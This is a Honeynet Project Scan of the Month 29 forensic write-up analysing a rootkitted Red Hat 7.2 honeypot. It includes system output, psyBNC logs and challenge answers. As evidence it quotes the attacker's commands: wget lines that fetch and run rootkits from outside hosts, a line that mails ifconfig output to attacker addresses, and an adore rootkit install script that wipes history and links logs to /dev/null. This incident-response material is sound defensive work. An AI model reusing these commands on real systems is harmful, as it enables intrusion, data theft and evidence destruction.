SotM Scan29
Writeup by Dophine V. Britanico
ACKNOWLEDGMENT
To GOD for without his guidance you're not reading this man.
To the Computer Security Community and Honeynet Project.
To all who submit entries here past and future. Keep on submitting.
To my daughters who inspire me.
CONTENTS
iii. LIVE ANALYSIS WEEKEND 1 -2
iv. WEEKEND 3
v. ANSWERS TO SOTM 29 QUESTIONS
vi. ATTACKER SCRIPTS
vii TRACES
viii SNIFFER LOGS
On August 10, 2003 a Linux Red Hat 7.2 system was compromised. Your mission is to analyze the compromised system. What makes this challenge unique is you are to analyze a live system. The image in question was ran within VMware. Once compromised, we suspended the image. The challenge to you is to download the suspended image, run it within VMware (you will get a console to the system with root access), and respond to the incident. When responding to the incident, you may do a live analysis of the system or you can first verify that the system has been compromised and then take it down for a dead analysis (or a combination of both). In either case, you will be expected to explain the impact you had on the evidence. Fortunately, this system was prepared for an incident and MD5 hashes were calculated for all files before the system was deployed. Note, this image was recovered from VMware Workstation 4.0, it will not work in older versions. You can download an evaluation copy.
Download Attempt Failed:
My first and second attempt to download the suspended image of SOTM 29 challenge failed and took me almost a day figuring out why on earth, those attempts failed . Using my friend’s computer which is connected using broadband, (compared to my lowly dial-up connection which is not able to digest the stream as fast as I want it), I was able download the file faster thereby reducing the economic cost and man hour on my part. But I've encountered an error and I don’t know if this can be duplicated by others. Using XP OEM (SP1), I’ve found out that using IE (with latest hot fixes) failed to properly reassemble (I don’t think this is the right technical term) the streams from the tar.bz2 MIME type. My remedy, manually adding the .bz2 extensions on windows but failed, to make it sure I download it twice to verify but still get the same error. As I've seen it the current connection's is O.K. it has packet filtering firewall, there's no trojans as far as I can evaluate, and no malware either. My initial suspect was, it was part of the challenge and the md5sum hashes was intentionally change by project honeynet to fool us, but twice I’ve downloaded the file completely but when I’ve check the md5sum it was different. To further confirmed that my connections is clean I downloaded a huge iso file and it all goes well, thus leaving the assumption that my connections has something to do with it. Using bzip2recover utility I manually recovered part of the file. I even inquired project honeynet (Lance) and replied back that it was downloaded 1,500 times if I recall it right and with no error. So my conclusions is that my connections is ok, the other side is ok, therefore IE has to do with it. Correct me ppl if I’m mistaken: -). How I downloaded it? I installed Linux on one of the computers and on my 1st attempt. Presto! fast download, Linux identified the .bz2 MIME type extensions correctly and the md5sum is identical with the one on those of project honeynet.
[root@localhost root] md5sum linux-suspended.tar.bz
d95a8c351e048bd7d5596d6fc49b6d72 linux-suspended.tar.bz
The first thing a sane forensic analyst will certainly do when performing Live Incident response would be to duplicate the entire system and catalog it [10][11], second assessed how critical the damage and crucial the data that’s resides inside the compromised system, whether it is advisable to enter in single user mode and or permanently disconnect the connections from external network for dead analysis and without affecting the performance of the entire system, or figure out whether implementing those actions will not trigger the system to self destruct if it is booby trap, or evaluate and re-consider the usage requirement of users if ever anybody is relying solely for precious connections from the compromised system and need not be disconnected. If one of the above criteria fails and or in dependency with one of the above, then combination of both can be performed by the forensic analyst, and a computer security expert. Live and dead analysis. The general rule is “the earlier the better” and where data is still fresh.
VMware [1h] preserves the current states of the virtual machine by suspending , saving, and reverting and can satisfies one of the criteria of Incident Response, duplication of the entire virtual machine also can be easily done by using simple copy or using dd, and netcat if ever this was a real system. On SOTM 29 here’s the step by step process I’ve done.
(1) Before resuming the current state of compromised virtual machines (VMX), beside the md5sum
combination pair I backup first the entire VMX by copying it in another folder.
(2) Setup another VMX using Vanilla RH 8.0 with host only networking support and check if network
traffic can be seen by the Host O.S.
(3) Installed packet filtering firewall on the Host O.S. just in case something nasty comes out from
the rouge VMX.
(4) Manually edited the VMX configuration file ‘’linux.vmx” and changing the following lines, so that I
can use it on windows.
ide0:0.fileName = "/dev/cdrom" to ide1:0.fileName = "auto detect"
ide0:0.deviceType = "atapi-cdrom" to ide1:0.deviceType = "cdrom-raw"
(5) Resumes the VMX and just after the login procedure saved the current VMX so that reverting
would be easier later.
(6) I perform some live neanderthal forensics acrobatics.
iii. LIVE ANALYSIS: WEEKEND 1 - 2
TOOLS: linux binaries including mount, md5sum, dd , dumpfs, the intruder binaries ls, ps, netstat,
ifconfig, md5deep, and chkrootkit [1i].
My initial instinct after I’ve seen the running compromised system is that it has a network sniffer [12] running by seeing the word “eth0: Promiscuous mode enabled.” a classic signature of a system NIC enabled in promiscuous mode [13], I’ve also notice an unusual init process popping up just after authentication “(swapd)” which is probably a hidden process that listen to RAW socket (PF_INET, SOCK_PACKET) in which the kernel reported to be obsolete. On my system “INIT: “ is puking and it keeps reminding me that it is respawning too fast, another hint that something is bad and checking /etc/fstab reveals another interesting information . Remembering that this is not a real system I’m almost tempted to switch into single user mode and see how the system reacts but having thought that the startup scripts has been compromised and might erase again some logs and make post mortem analysis harder and time consuming, I prefer to test some binaries that I know is the favorite of almost all of rootkits and took a peek of the system live without a clean binary.
First I’ve test ls and nothing seems funny (but we assume this ones is not the original), traversing different directory , creating invisible directories like “dot space “ and see how ls reacts,
[root@localhost root]cd /tmp; mkdir ". "
[root@localhost root]ls - al
total 12
drwxrwxrwt 3 root root 4096 Aug 10 22:18 .
drwxr-xr-x 2 root root 4096 Aug 10 22:18 .
drwxr-xr-x 18 root root 4096 Aug 10 15:54 ..
clever!, so the attacker assumes if we are looking for “dot dot space “ directory, an inexperience administrator may ignore it, and concludes that the ls binary is in good place. Again let’s try passing some arguments to ls like ls -al -1 and etc. Now when I pass...
[root@localhost root]ls - alh
ls: invalid option -h
Try ‘ls -help’ for more information
That certainly trip it, md5sum and md5deep confirms that it was indeed replace.
Now checking /etc/fstab to find out why INIT is complaining.
Wow! in /etc/fstab automounts /dev/shm as tempfs which contains a script that notifies the hacker thru email to newprtaceuser@yahoo.com when the honeypot is online sends the honeypot IP and it is SETUID SETGID a legitimate SysAd would not do this.
Let’s look for hidden files this time using find
[root@localhost root] find / -name “.*” -print xdev | more
/var/spool/at.SEQ
/etc/opt/pysbnc/tools/.chk
/etc/skel/.bash_logout
/etc/skel/.bash_profile
/etc/skel/.bashrc
/etc/.pwd.lock
/usr/lib/perl5/5.6.0/i386-linux/.packlist
/usr/share/doc/samba-2.2.1a/examples/VFS/.cvsignore
/usr/share/man/man1/..1.gz
/lib/.x
/lib/.x/.boot
/root/.bash_logout
/root/.Xresources
/root/.bash_profile
/root/.bashrc
/root/.cshrc
/root/.tcshrc
/root/.bash_history
/root/.ssh
/root/.links
/.autofsck
/.bash_history
Hmm!, what does ''.bash_history'' doing in the parent directory. There are only two possibilities here either systems started in single user mode or an after an exploit.
[root@localhost root]cd /; cat .bash_history
uptime
./inst
hostname
hostname sbm79.dtc.apu.edu
cd /dev/shm/sc
./install sbm79.dtc.apu.edu
rm -rf /var/mail/root // Legitimate Admin wouldn't delete this
ps x
cd /tmp
ls -a
wget izolam.net/ssltop.tar.gz // It's modifies httpd.conf
ps x
ps aux | grep apache
kill -9 21510 21511 23829 23292 23302
The intruder also installed psybnc and poking into the configuration and logs I have found out another interesting hint.
On psybnc.conf
PSYBNC.SYSTEM.PORT1=65336
USER1.USER.LOGIN=sic
USER1.USER.USER=_4,1I`m siCk motherfucker siCk_
USER1.USER.PASS==`N`Y1y`T1201'l`C`g
.
..
USER1.SERVERS.SERVER1=mesa.az.us.undernet.org
USER1.SERVERS.PORT1=6667
USER1.CHANNELS.ENTRY1=#radioactiv
USER1.CHANNELS.ENTRY0=#RedCode
USER2.USER.LOGIN=redcode
USER2.USER.USER=_4,1redCode_8Chicken_
USER2.USER.PASS==`&'X1e'O`t1I1k'8'6
On psybnc.log.
Sun Aug 10 16:02:46 :psyBNC2.3.1-cBtITLdDMSNp started (PID :15119)
Sun Aug 10 16:03:32 :connect from sanido-09.is.pcnet.ro
Sun Aug 10 16:03:32 :New User:sic (wqewqde dedwqere) added by sic
.
..
Sun Aug 10 17:49:47 :User sic logged in.
Sun Aug 10 17:50:39 :New User:redcode (_4,1redCode_8Chicken_) added by sic
Sun Aug 10 17:50:51 :User redcode () has no server added
Sun Aug 10 17:51:22 :connect from sanido-08.is.pcnet.ro
Sun Aug 10 17:51:22 :User redcode logged in.
Sun Aug 10 17:51:36 :User redcode () trying mesa.az.us.undernet.org port 6667 ().
Sun Aug 10 17:51:36 :User redcode () connected to mesa.az.us.undernet.org:6667 ()
Sun Aug 10 17:51:42 :User redcode () got disconnected (from mesa.az.us.undernet.org) Reason: Closing Link: killme by mesa.az.us.undernet.org (Sorry, your connection class is full - try again later or try another server)
Sun Aug 10 17:52:06 :User redcode () trying mesa.az.us.undernet.org port 6667 ().
Sun Aug 10 17:52:06 :User redcode () connected to mesa.az.us.undernet.org:6667 ()
Sun Aug 10 18:00:49 :User redcode quitted from sanido-08.is.pcnet.ro)
Changing directory to /lib/.x gave us another interesting (again) information
I’ve got some of the configuration scripts of the ssh backdoor, and sniffer.
using strings we got this information on the following files.
cl (ELF) = Die Putze log cleaner [1d]
inst (SCRIPT) = sniffer which is copied to /sbin/init
log (ELF) = SUCKIT LKM [1e] rootkit
sln (ELF) UPX [1f] packer =
mfs = sniffer logs
r_s = SSH initial random seed value
s_h_k = intruder SSH private key
s_h_k.pub = intruder SSH public key
sshd_config = SSHD config file
xopen = SSH
and Let’s get back with (swapd) before we are lost in haste.
[root@localhost root]cd /
[root@localhost /]find / -name "(swapd)"
Lo and behold !, (swapd) is not a standard linux binary as far as I’m concerned and it was located in /usr/bin/(swapd), using strings further reveal more intruder activities. My initial assessment is that it was a sniffer by the strings output.
<cut>
cant get SOCK_PACKET socket
cant get flags
cant set promiscuous mode
..
eth0
/usr/lib/libice.log
can’t open log
rm %s
.
<snip..>
Another hint for us so looking at /usr/lib/libice.log using vi
Proxyscan.undernet.org => 192.168.179 [23]
Hmm!, if we try to decipher this, it is a log connection from proxyscan.undernet.org to our honeypot on port 23.
Next , if the system a while ago reported that interface “eth0” is on promiscuous mode logic will told us that, ifconfig should report it too.
[root@localhost root]ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:8328 errors:109 dropped:0 overruns:0
TX packets:0 errors:0 dropped:0 overruns:8328
eth0 Link encap:10Mbps Ethernet HWaddr 00:0C:29:89:42:93
inet addr:192.168.1.79 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:6618588 errors:9788 dropped:0 overruns:0
TX packets:0 errors:0 dropped:0 overruns:868319
Interrupt:10 Base address:0x10e0
None, so this confirms again our md5sum hashed. Let’s see the logs.
[root@localhost root]cd /var/log; ls -al
Notice that files is link to /dev/null and some files are missing and using vi for secure.
Aug 10 16:04:14 telnet session from 193.109.122.5
And failed ssh connection from 202.85.165.46 on same date 18:58:33
Using vi for maillog reveals even more interesting hint for us that corroborate logs we found in pysbnc. Intruder sending system information to this email addresses.
jijeljijel@yahoo.com
newptraceuser@yahoo.com
skiZophrenia_siCk@yahoo.com
[root@localhost root]cd
[root@localhost root]ls -al .bash_history
w00w00! .bash_history is also simlink to /dev/null. Indeed System was compromised and trying ps this time.
[root@localhost root] ps x
PID TTY STAT TIME COMMAND
1 ? S 0:05 init
2 ? SW 0:00 [keventd]
3 ? SW 0:00 [kapm-idled]
4 ? SWN 0:00 [ksoftirqd_CPU0]
6 ? SW 0:00 [kreclaimd]
7 ? SW 0:00 [bdflush]
8 ? SW 0:00 [kupdated]
9 ? SW< 0:00 [mdrecoveryd]
17 ? SW 0:05 [kjournald]
92 ? DW 0:00 [khubd]
657 ? S 0:00 /usr/sbin/apmd -p 10 -w 5 -W -P /etc/sysconfig/apm-scri
699 ? S 0:00 /usr/sbin/sshd
732 ? S 0:00 xinetd -stayalive -reuse -pidfile /var/run/xinetd.pid
759 ? S 0:00 sendmail: accepting connections
778 ? S 0:00 gpm -t ps/2 -m /dev/mouse
820 ? S 0:00 crond
893 1 S 0:00 login -- root
894 2 S 0:00 /sbin/mingetty tty2
895 3 S 0:00 /sbin/mingetty tty3
896 4 S 0:00 /sbin/mingetty tty4
899 5 S 0:00 /sbin/mingetty tty5
900 6 S 0:00 /sbin/mingetty tty6
901 1 S 0:00 -bash
3247 ? S 0:00 syslogd -m 0
3252 ? S 0:00 klogd -2
15119 ? S 0:00 initd
15440 ? S 0:00 CROND
15443 ? S 0:00 /usr/sbin/sendmail -FCronDaemon -i -odi -oem root
15605 1 R 0:00 ps x
25239 ? S 0:00 /lib/.x/s/xopen -q -p 3128
25241 ? S 0:00 /lib/.x/s/xopen -q -p 3128
25247 ? S 0:00 /lib/.x/s/lsn
Very unusual process running 15440, 25239, 25241, 25247 lets get back to it later.
Now trying netstat
[root@localhost root] netstat -an
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 192.168.1.79:65336 213.154.118.200:1188 ESTABLISHED
tcp 0 0 0.0.0.0:65436 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:3128 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:65336 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:2003 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:79 0.0.0.0:* LISTEN
udp 0 0 0.0.0.0:3049 0.0.0.0:*
Active UNIX domain sockets (including servers)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ] DGRAM 804
unix 2 [ ] DGRAM 924
unix 2 [ ] DGRAM 990
unix 2 [ ] DGRAM 1078
unix 3 [ ] DGRAM 7993
unix 2 [ ] DGRAM 15679
unix 4 [ ] DGRAM 7984 /dev/log
unix 2 [ ACC ] STREAM LISTENING 943 /dev/gpmctl
Active IPX sockets
Proto Recv-Q Send-Q Local Address Foreign Address State
Very unusual port activated and one connection established, but we are not sure because we know that netstat is also replace like ifconfig and ps.
Let’s confirm now our initial assessment before all things gets dirty by using md5deep, md5sum and chkrootkit by mounting the CDROM Drive.
[root@localhost root]mount /dev/cdrom /mnt; cd /mnt/ ; cp linux-suspended-md5s.gz md5deep-0.16.tar.gz chkrootkit-0.41.tar.gz /tmp/; cd /tmp/; gzip –d linux-suspended-md5s.gz md5deep-0.16.tar.gz
[root@localhost tmp]md5sum -c linux-suspended-md5s | grep FAILED > failed; vi failed
/var/lib/slocate/slocate.db: FAILED
/var/lib/random-seed: FAILED
/var/lib/logrotate.status: FAILED
/var/log/messages: FAILED
/var/log/lastlog: FAILED open or read
/var/log/secure: FAILED
/var/log/maillog: FAILED
/var/log/wtmp: FAILED
/var/log/sa/sa14: FAILED open or read
/var/log/sa/sa15: FAILED open or read
/var/log/sa/sar14: FAILED open or read
/var/log/sa/sa16: FAILED open or read
/var/log/sa/sar15: FAILED open or read
/var/log/sa/sa06: FAILED open or read
/var/log/samba/log.smbd: FAILED open or read
/var/log/samba/smbd.log: FAILED open or read
/var/log/samba/log.nmbd: FAILED open or read
/var/log/samba/localhost.log: FAILED open or read
/var/log/xferlog: FAILED open or read
/var/log/httpd/error_log: FAILED open or read
/var/log/httpd/ssl_engine_log: FAILED open or read
/var/log/httpd/access_log: FAILED open or read
/var/log/httpd/ssl_request_log: FAILED open or read
/var/log/httpd/access_log.1: FAILED open or read
/var/log/httpd/error_log.1: FAILED open or read
/var/log/dmesg: FAILED
/var/log/cron: FAILED
/var/log/boot.log: FAILED
/var/log/rpmpkgs: FAILED open or read
/var/cache/man/whatis: FAILED
/var/cache/samba/smbd.pid: FAILED
/var/cache/samba/connections.tdb: FAILED
/var/cache/samba/nmbd.pid: FAILED
/var/run/utmp: FAILED
/var/run/runlevel.dir: FAILED
/var/run/syslogd.pid: FAILED
/var/run/klogd.pid: FAILED
/var/run/apmd.pid: FAILED
/var/run/sshd.pid: FAILED
/var/run/sendmail.pid: FAILED
/var/run/gpm.pid: FAILED
/var/run/crond.pid: FAILED
/var/run/ftp.pids-all: FAILED open or read
/var/run/ftp.rips-all: FAILED open or read
/var/spool/anacron/cron.daily: FAILED
/var/spool/anacron/cron.weekly: FAILED
/tmp/root.md5: FAILED open or read
/etc/mtab: FAILED
/etc/passwd: FAILED
/etc/rc.d/init.d/functions: FAILED
/etc/rc.d/rc.sysinit: FAILED
/etc/mail/statistics: FAILED
/etc/aliases.db: FAILED
/etc/adjtime: FAILED
/etc/samba/secrets.tdb: FAILED
/etc/httpd/conf/httpd.conf: FAILED
/etc/shadow: FAILED
/usr/bin/top: FAILED
/bin/netstat: FAILED
/bin/ls: FAILED
/bin/ps: FAILED
/sbin/ifconfig: FAILED
and using chkrootkit [1K] detects LKM rootkits.
[root@localhost tmp]./chkrootkit
ROOTDIR is ‘/’
<cut>
.
..
Checking ‘ifconfig’ ... INFECTED
Checking ‘ls’ ... INFECTED
Checking ‘netstat’ ... INFECTED
Checking ‘ps’ ... INFECTED
Checking ‘top’ ... INFECTED
.
<snip>
..
Searching for sniffer’s logs, it may take a while ,,, nothing found :-(
.
..
Searching for suspicious files and dirs, it may take a while...
/usr/lib/perl5/5.6.0/i386-linux/.packlist /lib/.x/ /lib/.x/.boot
.
..
Searching for anomalies in shell history files...Warning: ‘//root/.bash_history’ is linked to another file (‘’ln -s /dev/null /root/bash_history’’)
Checking ‘bindshell’... INFECTED (PORTS : 3049)
Checking ‘lkm’... You have 3 process hidden for ps command
Warning Possible LKM Trojan installed
Checking ‘sniffer’...
eth0 is PROMISC
chkrootkit confirms also previous assessment.
iv. WEEKEND 3
Restoring again from my backup using find, I was able also to locate some of the original binaries located in /usr/lib/libshtift/ directory.
[root@localhost root]/usr/lib/libshtift/ps -xuw
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.5 1424 528 ? S Aug09 0:05 init
root 2 0.0 0.0 0 0 ? SW Aug09 0:00 [keventd]
root 3 0.0 0.0 0 0 ? SW Aug09 0:00 [kapm-idled]
root 4 0.0 0.0 0 0 ? SWN Aug09 0:00 [ksoftirqd_CPU0]
root 5 0.0 0.0 0 0 ? SW Aug09 0:00 [kswapd]
root 6 0.0 0.0 0 0 ? SW Aug09 0:00 [kreclaimd]
root 7 0.0 0.0 0 0 ? SW Aug09 0:00 [bdflush]
root 8 0.0 0.0 0 0 ? SW Aug09 0:00 [kupdated]
root 9 0.0 0.0 0 0 ? SW< Aug09 0:00 [mdrecoveryd]
root 17 0.0 0.0 0 0 ? SW Aug09 0:06 [kjournald]
root 92 0.0 0.0 0 0 ? DW Aug09 0:00 [khubd]
root 657 0.0 0.5 1396 524 ? S Aug09 0:00 /usr/sbin/apmd -p 10 -w 5 -W -P /etc/sysconfig/apm-scripts/apmscript
root 699 0.0 1.3 2676 1272 ? S Aug09 0:00 /usr/sbin/sshd
root 732 0.0 1.0 2264 956 ? S Aug09 0:00 xinetd -stayalive -reuse -pidfile /var/run/xinetd.pid
root 759 0.0 2.1 5296 1984 ? S Aug09 0:00 sendmail: accepting connections
root 778 0.0 0.5 1440 496 ? S Aug09 0:00 gpm -t ps/2 -m /dev/mouse
root 820 0.0 0.6 1584 660 ? S Aug09 0:00 crond
root 893 0.0 1.1 2320 1076 tty1 S Aug09 0:00 login -- root
root 894 0.0 0.4 1384 448 tty2 S Aug09 0:00 /sbin/mingetty tty2
root 895 0.0 0.4 1384 448 tty3 S Aug09 0:00 /sbin/mingetty tty3
root 896 0.0 0.4 1384 448 tty4 S Aug09 0:00 /sbin/mingetty tty4
root 899 0.0 0.4 1384 448 tty5 S Aug09 0:00 /sbin/mingetty tty5
root 900 0.0 0.4 1384 448 tty6 S Aug09 0:00 /sbin/mingetty tty6
root 901 0.0 1.3 2452 1296 tty1 S Aug09 0:00 -bash
root 3137 0.0 0.7 1900 716 ? S 13:33 0:03 smbd -D
root 3153 0.0 0.7 1664 704 ? S 13:33 0:00 (swapd)
root 3247 0.0 0.6 1472 592 ? S 13:33 0:00 syslogd -m 0
root 3252 0.0 1.1 1984 1096 ? S 13:33 0:00 klogd -2
root 25239 0.0 0.3 1880 336 ? S 15:32 0:00 /lib/.x/s/xopen -q -p 3128
root 25241 0.0 0.7 1888 672 ? S 15:32 0:00 /lib/.x/s/xopen -q -p 3128
root 25247 0.0 0.7 1668 732 ? S 15:32 0:00 /lib/.x/s/lsn
root 15119 0.0 1.3 2296 1240 ? S 16:02 0:00 initd
root 15607 0.0 0.7 2636 728 tty1 R 20:34 0:00 /usr/lib/libshtift/ps -xuw
[root@localhost root]/usr/lib/libshtift/netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:79 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:2003 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:65336 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:3128 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:65436 0.0.0.0:* LISTEN
tcp 0 0 192.168.1.79:65336 213.154.118.200:1188 ESTABLISHED
tcp 0 34 192.168.1.79:1149 64.62.96.42:6667 FIN_WAIT1
tcp 0 9 192.168.1.79:1146 199.184.165.133:6667 ESTABLISHED
udp 0 288 192.168.1.79:1030 192.168.1.1:53 ESTABLISHED
udp 0 0 0.0.0.0:3049 0.0.0.0:*
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ACC ] STREAM LISTENING 943 /dev/gpmctl
unix 4 [ ] DGRAM 7984 /dev/log
unix 2 [ ] DGRAM 15679
unix 2 [ ] DGRAM 7993
unix 2 [ ] DGRAM 1078
unix 2 [ ] DGRAM 990
unix 2 [ ] DGRAM 924
unix 2 [ ] DGRAM 804
Active IPX sockets
Proto Recv-Q Send-Q Local Address Foreign Address State
[root@localhost root]/usr/lib/libshtift/ifconfig
eth0 Link encap:Ethernet HWaddr 00:0C:29:89:42:93
inet addr:192.168.1.79 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
RX packets:9788 errors:0 dropped:0 overruns:0 frame:0
TX packets:9100 errors:0 dropped:0 overruns:0 carrier:0
collisions:0
RX bytes:6618588 (6.3 Mb) TX bytes:868823 (848.4 Kb)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:113 errors:0 dropped:0 overruns:0 frame:0
TX packets:113 errors:0 dropped:0 overruns:0 carrier:0
collisions:0
RX bytes:8684 (8.4 Kb) TX bytes:8684 (8.4 Kb)
Next using grep and sleuthkit[15], and was able to locate more information.
As I’ve often observed, Blackhats usually after gaining super user status remotely they will and always find a way to retrieve their 0day rootkits, and etc somewhere either utilizing FTP, or WGET or by other means like DCC, NETCAT, LYNX and etc. to patch their newly owned box. So using this common hacking methods I was able to retrieve from the VMX disk the following information’s.
wget izolam.net/rc/inst -q
wget izolam.net/adore
wget izolam.net/rc/ssh/sp0
wget izolam.net/gods
wget izolam.net/ssltop.tar.gz
wget www.psychoid.lam3rz.de/psybnc
wget geocities.com/mybabywhy/rk.tar.gz
wget geocities.com/gavish19/abc.tgz
wget lugojteam.as.ro/rootkit.tar
wget www.i-need-ftp.as.ro/ttt.gz
wget irine11979.go.ro/mass2.tgz
wget irine11979.netfirms.com/er.tgz
wget irine11979.go.ro/a.tgz
wget takiweb.com/~xlogic/xl.tgz; tar zxvf xl.tgz;cd xl; ./statz
lynx -source 209.249.147.160/~deal/qd 1> qd 2>/dev/null
And after following all the links, duplicating the commands uncompressed the tar balls and utilizing goooooooooogle I was able to acquire the some of the files and the rootkit. files compared using md5sum with the live systems strongly confirm their similarities.
greping /proc/kcore ‘core’ files also reveals similar information's from previous assessments.
I discovered also part of the sniffer logs IMHO (forgive me if this is incomplete) , and found intruders fingerprints like /sbin/ifconfig -a | mail -s "'/sbin/ifconfig | grep inet | awk '{print $2' | cut -d: -f2'" -c ghost@altavista.com em1nemk1t@yahoo.com . Another relevant informations also like intruders user and password ‘’pwd: hack3r user: hack3r’’ combination installing rootkit and unstar it.
That’s all folks!!! :- ((
v. ANSWERS TO SOTM 29 QUESTIONS
Questions
A) After resuming the VMX I already know that the machine is compromised by the NIC output where and it was enabled promiscuous mode.
B) By mounting my computer CD-ROM drive with tools like, md5sum, md5deep, chkrootkit and sleuthkit I was able to confirm the honeynet was compromised by comparing the original md5sum hash from project honeynet to the live host, and using chkrootkit.
C) Using the linux binaries like ls and testing how it reacts when I pass parameters that I know that is valid where the trojaned binaries fails, I also used the find command looking for occurrences of suspicious files and directories on the honeypot and also using strings/grep.
D) Finally I was able to confirm that the intruder utilized LKM rootkit such as suckit[1e] and adore[14] by doing strings command for each of the suspected files detected by chkrootkit and files I found manually from the compromised system and utilizing google .
Further details above sub-titled LIVE ANALYSIS: WEEKEND 1-2 .
Since the CD-ROM drive are mounted RO by default, there is no critical effect on files located on the CD-ROM since it can’t be altered and no impact on the running system either. Testing the compromised host without any clean binary at hand I was able to perform post mortem live analysis flawlessly because the altered or modified binaries does not have any self-destructive mechanism that may affect the running system. Running in single user mode or taking down the system for dead analysis prolong the job and miss some properties available only on the suspended state. IMPACT to system NONE, to me AHHHH! just lots of wasted electricity, and coffee. :- )
Further details above sub-titled LIVE ANALYSIS: WEEKEND 1-2.
PID 25239 lib/.x/s/xopen -q -p PORT 3128
PID 25241 /lib/.x/s/xopen -q -p PORT 3128
Yes there were active connections on the compromised system.
The address are from the honeypot 192.168.1.79 to
213.154.118.200 HP WEB ADMIN
64.62.96.42 IRC
199.184.165.133 IRC
192.168.1.1:53 DNS probably VMWARE
Further details above sub-titled WEEKEND 3
I think there were 4 instances of SSH installed,
1 /usr/sbin/sshd time 0:00 AM PID 699
2 /lib/.x/s/xopen time 3:52 PM PID 25239
3 /lib/.x/s/xopen time 3:52 PM PID 25247
4 /usr/bin/"smbd -D" time 3:33 PM PID 3137
Further details above sub-titled WEEKEND 3
ssh disguise as xopen with PID’s 25239 and 25247 which listens on non standard ssh port 3128. And /usr/bin/"smbd -D" PID 31337
Further details above sub-titled WEEKEND 3
Yes one of the SSH servers were modified it was /usr/bin/"smbd -D" with PID 3137 which I believe was part adore rootkit fake sshd.
Yes information was collected by /usr/bin/"smbd -D" and the logs were save in /usr/lib/libice.log (I believed this are part of logs, recovered using sleuthkit)
Using chkrootkit I was able to determined executables trojaned:
like pico, ps, ifconfig, ls, netstat, top, /usr/bin/crontabs, /dev/shm/k . And using the data I gathered using standard linux binaries and sleuthkit this are the configurations files I've found that are use
/etc/rc.d/init.d/functions which invoke sniffer /usr/bin/crontabs
/etc/httpd/conf/httpd.conf
Further details above sub-titled LIVE ANALYSIS: WEEKEND 1-2. and
detailed scripts installation process below sub-titled SCRIPTS.
Sorry lack of time, google will do.
Bonus Question:
What nationality do you believe the attacker(s) to be, and why?
The nationality of the attacker(s) are Romanian, basing on the IP 213.154.118.200 which resolves to is.pcnet.ro which is also being found inside the configuration and log files of psybnc located at /etc/opt directory and using the clean binary netstat located in /usr/lib/libshtift/. Using grep on the disk and on core file located on /proc/kcore. Found the attackers URL redirected website http://redcode.strobe.org [1j] at http://redcode.go.ro/ from their hosting site (http://strobe.org / http://freedns.afraid.org) see traces. This is also being found on psybnc logs with channel #redcode seen on it, the Blackhat handle [siCk] which is plainly seen and the Romanian transcripts (Translated [1g])found also on the scripts.
vi. SCRIPTS
File ".inst" installation script for adore rootkit. Source Location wget izolam.net\inst (Remote)
#!/bin/shunset HISTFILE HISTSIZE HISTSAVEBLK="\033[0;30m"RED="\033[0;31m"GRN="\033[0;32m"YEL="\033[0;33m"BLU="\033[0;34m"MAG="\033[0;35m"CYN="\033[0;36m"WHI="\033[0;37m"DRED="\033[1;31m"DGRN="\033[1;32m"DYEL="\033[1;33m"DBLU="\033[1;34m"DMAG="\033[1;35m"DCYN="\033[1;36m"DWHI="\033[1;37m"BW="\033[47;1;30m"YBL="\033[44;1;33m"RES="\033[0m"printf "${YBL}redCode${RES} ${DRED}rkit${RES}\n"printf "${YBL}redCode${RES}${YBL}redCode${RES}${YBL}redCode${RES}\n"cd adoremakemv ava /bin/avamv adore.o /usr/lib/mv cleaner.o /usr/lib/cd ..printf "${DCYN}Starting SSHD...${RES}\n"printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n"mv ssh/sp0 /bin/mv ssh/* /usr/lib/printf "${DCYN}Hiding everything...${RES}\n"rm -rf /.bash_historyln -sf /dev/null /root/.bash_historyprintf "${DCYN}Cleaning megs ${RES}\n"rm -rf /var/log/messagesln -sf /dev/null /var/log/messagesprintf "${DCYN}[${GRN}OK${DCYN}]${RES}\n"echo >>/etc/rc.d/rc.sysinit kflushdmv kflushd /bin/kflushdprintf "${DCYN}[${GRN}OK${DCYN}]${RES}\n"printf "${DCYN}Cleaning all the tracks...${RES}\n"cd ..rm -rf .rcprintf "${DCYN}[${GRN}OK${DCYN}]${RES}\n"printf "${DCYN}All done...${RES}\n"printf "${DCYN}You Got The root${RES} ${YEL}$IP${RES}\n"printf "${DRED}Copyright ${BW}[siCk]${RES} ${DCYN}\n"
File “.boot" scripts contains the scripted commands. Location directory /lib/.x/ (Local)
#!/bin/sh
